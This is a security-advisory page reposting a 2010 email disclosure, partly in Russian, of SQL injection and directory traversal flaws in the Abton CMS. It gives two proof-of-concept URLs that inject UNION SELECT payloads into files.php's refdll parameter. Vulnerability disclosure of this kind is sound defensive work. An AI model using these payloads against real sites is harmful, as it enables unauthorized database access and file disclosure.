Computer Security

Security Advisory: SQL Injection and Directory Traversal vulnerabilities in Abton
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Pogodny CMS SQL vulnerabilities

  Pixel Portal Sql Injection Vulnerability

  SQL injection vulnerability in Amelia CMS

  Kusaba X <= 0.9 XSS/CSRF vulnerabilities

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:22.02.2010
Subject:SQL Injection and Directory Traversal vulnerabilities in Abton

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL Injection и Directory Traversal уязвимостях
в Abton (это украинская CMS).

SQL Injection:

http://site/files.php?refdll=-1+union+select+version()%23

Directory Traversal (через SQL Injection):

http://site/files.php?refdll=-1+union+select+’../file.php’%23

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3618/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server